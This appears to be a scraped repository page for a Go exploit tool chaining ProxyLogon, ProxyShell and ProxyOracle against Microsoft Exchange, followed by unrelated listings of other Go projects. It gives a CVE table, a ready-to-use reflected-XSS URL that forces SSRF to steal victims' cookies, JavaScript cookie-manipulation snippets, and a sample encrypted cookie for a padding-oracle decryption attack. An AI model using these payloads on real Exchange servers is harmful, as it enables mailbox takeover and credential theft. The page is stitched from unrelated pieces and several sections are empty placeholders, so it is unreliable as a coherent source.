proxylogon, proxyshell, proxyoracle full chain exploit tool



proxylogon, proxyshell, proxyoracle full chain exploit tool

  1. ProxyLogon: The most well-known and impactful Exchange exploit chain
  2. ProxyOracle: The attack which could recover any password in plaintext format of Exchange users
  3. ProxyShell: The exploit chain demonstrated at Pwn2Own 2021 to take over Exchange and earn $200,000 bounty

ProxyLogon is Just the Tip of the Iceberg: A New Attack Surface on Microsoft Exchange Server! Slides Video

most of the exploit is recoded with golang to speed up... and for learning golang purpose :)

NAME CVE patch time description
ProxyLogon CVE-2021-26855 Mar 02, 2021 server-side request forgery (SSRF)
ProxyLogon CVE-2021-27065 Mar 02, 2021 Microsoft.Exchange.Management.DDIService.WriteFileActivity未校验写文件后缀,可由文件内容部分可控的相关功能写入WebShell
ProxyOracle CVE-2021-31196 Jul 13, 2021 Reflected Cross-Site Scripting
ProxyOracle CVE-2021-31195 May 11, 2021 Padding Oracle Attack on Exchange Cookies Parsing
ProxyShell CVE-2021-34473 Apr 13, 2021 Pre-auth Path Confusion leads to ACL Bypass
ProxyShell CVE-2021-34523 Apr 13, 2021 Elevation of Privilege on Exchange PowerShell Backend
ProxyShell CVE-2021-31207 May 11, 2021 Post-auth Arbitrary-File-Write leads to RCE
proxytoken CVE-2021-33766 July 13, 2021 With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users. As an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.
Microsoft Exchange Server 远程执行代码漏洞 CVE-2021-42321 Nov 17, 2021 Exchange Deserialization RCE



Once a victim clicks this link, will receive the cookies.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/`,{credentials:`include`});//

or use 3gstudent's way:


借助SSRF漏洞,控制Exchange服务器将Cookie信息发送至XSS平台,导致最终想要的Cookie信息位于Request Headers中




  • 修改index.js,使用ajax模拟用户发包触发SSRF漏洞

  • 修改 ,将GET请求的Request Headers进行提取

  • 使用合法的证书


var xmlHttp = new XMLHttpRequest();"GET", "", false);
document.cookie = "X-AnonResource=true";
document.cookie = "";



example cookie for decryption test:

cadata=FVtSAAWdOn29HYDQry+kG+994VUdAxONrayi4nbJW9JWTh8yLueD6IxYpahfxcGsA/B3FoVUQOD2EG605SR4QdeQ1pof+KD//6jwpmYQjv/II+OcqChrFZFvcMWv46a5; cadataTTL=eTxCEHKHDMmd/gEqDuOafg==; cadataKey=T4juhN4dUMKY4wkajUD43n4EWfMwefPQlqzxXmK4GnSHIZqo+g+uQg1Y2ogGoD1HyoVpRYgjGcCu6rmNQK+LsaZ8/lfBCThBI5yAhP1W2Fx+YNKvzy8Bcpui7zTlhAY598lE5Aijs6crHVXJeZkbLfMJgp0cFHj5uTQPcg31O/AeOAnD5c27IYOQ7JqMW7GOUVor1lhYnhh0R/NtWWqyfr5oE9j0jbxIGgrQrXIpLxL/uAU1ddC+/5jG9Edpq4sC213amuU/94rkHYzNH9OsiHYIkXr/NmkB7p908XrFrwXAcvV9QieoRiS3jvKCbzk3mnMu3YTnsJwAuiHzSXdCOQ==; cadataIV=GB9B+rwrigyPOf8xnV1KAek++yovEot9jFcV68WepCTQoRtQ5HUxSC7tE1mmHg0YtE6EOZNUM/WiNGP6xI4UTAofcMOfTLeRpBzeaKOETfjxKK2W7IKn+9k2tRkc1pIlO8FTOVx/dOHOoIFHUkqxFr+TgBULJ1I7tUmO7W0XDX4ZJHfmQhVqOOzeyjImKdX7Uv/jIJrF4VEew7rgvrC8BhqOqWgaTxpGhDTzIXl+wW3crsgZmXpXhOPURej1iwmtvhuQU6iuq4/IRv0lVIW3WvP6gUI8owIUxppnJl7YmN27Aqkjs0nTZZz1LBuZN+YxY4x6Lvs2FMG68jllhE4kwg==; cadataSig=BOJSYN2B+3RsXjO2akh3mqlKKkeAZVamOzfpVo0QdPEA3BHjpR6ls5yD9TzAQzRuWJJaaRIm7wMEiBMFz/sK5jk3R6kWw1OmMtJN2c38PdvwGIe6/7ByJdl52a5ojhDrRZhc4Qc3y+FFRx6XKvqUljTRWtHJGI1Jad2+LiNhJGkalhUeTM/a2V4LiQWf6Vv1KzJO79rZuOOOBnatht/E29j6636FpllCfEKrrogPQ7ADdVS6OOmqNU9gRMVgKnomC2t2PCtuYj26HUjnZ3rfc6BdzVmtu9EYSzccObsB2jxXXclAm5a+NZU/6sj9tlq3gcurjBl9yUDTgbZLg383gw==
  • amd64 poc binary usage:

  • just a modyfied version of padre, added proxyoracle detect poc code...

  • python script exp usage:

Decrypt this cookie to plaintext:


coming soon...


coming soon...

Exchange RCE CVE-2021-42321

coming soon...

more exp coming soon......

Reference (worship to orange!)

trapped in the darkest nightmare...
A C/S Tool to Download Torrent Remotely and Retrieve Files Back Over HTTP at Full Speed without ISP Torrent Limitation.

remote-torrent Download Torrent Remotely and Retrieve Files Over HTTP at Full Speed without ISP Torrent Limitation. This repository is an extension to

Bruce Wang 58 Aug 9, 2022
Node of the decentralized oracle network, bridging on and off-chain computation

Chainlink is middleware to simplify communication with blockchains. Here you'll find the Chainlink Golang node, currently in alpha. This initial imple

SmartContract 3.6k Aug 15, 2022
Validator node for Bittorrent Chain Network

Delivery Validator node for Bittorrent Chain Network. It uses peppermint, customized Tendermint. Install from source Make sure your have go1.11+ alrea

PanoptesDev 1 Dec 14, 2021
EVM-compatible chain secured by the Lachesis consensus algorithm

ICICB galaxy EVM-compatible chain secured by the Lachesis consensus algorithm. Building the source Building galaxy requires both a Go (version 1.14 or

Galaxy developer Team 10 Jan 8, 2022
Dcfs-core - Dcfs Smart Chain With Golang

Dcfs Smart Chain The goal of Dcfs Smart Chain is to bring programmability and in

null 0 Jan 12, 2022
[deprecated] A full-featured SPDY library for the Go language.

Deprecated With the release of Go1.6 and the addition of http2 to the standard library, this package is no longer under active development. It is high

Jamie Hall 119 Aug 6, 2022
Inspired by go-socks5,This package provides full functionality of socks5 protocol.

The protocol described here is designed to provide a framework for client-server applications in both the TCP and UDP domains to conveniently and securely use the services of a network firewall.

Zhangliu 69 Aug 15, 2022
Full-featured BitTorrent client package and utilities

torrent This repository implements BitTorrent-related packages and command-line utilities in Go. The emphasis is on use as a library from other projec

Matt Joiner 4.5k Aug 13, 2022
SOCKS Protocol Version 5 Library in Go. Full TCP/UDP and IPv4/IPv6 support

socks5 中文 SOCKS Protocol Version 5 Library. Full TCP/UDP and IPv4/IPv6 support. Goals: KISS, less is more, small API, code is like the original protoc

TxThinking 477 Aug 10, 2022
Baseledger core consensus for running validator, full and seed nodes

baseledger-core Baseledger core consensus client for running a validator, full or seed node. ⚠️ WARNING: this code has not been audited and is not rea

Baseledger 0 Jan 13, 2022
Server and client implementation of the grpc go libraries to perform unary, client streaming, server streaming and full duplex RPCs from gRPC go introduction

Description This is an implementation of a gRPC client and server that provides route guidance from gRPC Basics: Go tutorial. It demonstrates how to u

Joram Wambugu 0 Nov 24, 2021
Imersão Full Cycle 5

Imersão Full Cycle 5 Dinâmica do sistema Tecnologias Frontend Painel: Next.js Backend Painel: Nest.js Microsserviço processamento: Golang Sistema de m

null 1 Jan 10, 2022
A Go package for creating contributor list by release, Help full for those organization that use one repository for platform release

This is a Go package which create contributors list by release by scanning across all repository that exist in organisation, Only helpful for those or

Yuvraj 0 Dec 26, 2021
Wrapper around bufcli to make it do cross-repo compiles for private repos and use full paths.

Bufme A tool for compiling protos with full directory paths and cross repo compiles. Introduction Protocol buffers rock, but protoc should die in a fi

John Doak 0 Feb 5, 2022
A Gradle Plugin Providing Full Support for Go

Gogradle - a Full-featured Build Tool for Golang 中文文档 Gogradle is a gradle plugin which provides support for building golang. 2017-06-23 Gogradle is a

null 768 Aug 10, 2022
This is a tool that allows you to check minecraft names availability, this tool can do around 3000~ names a minute or more!

Checker This is a tool that allows you to check minecraft names availability, this tool can do around 3000~ names a minute or more! Tutorial To instal

null 3 Feb 13, 2022
Traefik config validator: a CLI tool to (syntactically) validate your Traefik configuration filesTraefik config validator: a CLI tool to (syntactically) validate your Traefik configuration files

Traefik Config Validator Note This is currently pre-release software. traefik-config-validator is a CLI tool to (syntactically) validate your Traefik

Thomas Klinger 0 Dec 16, 2021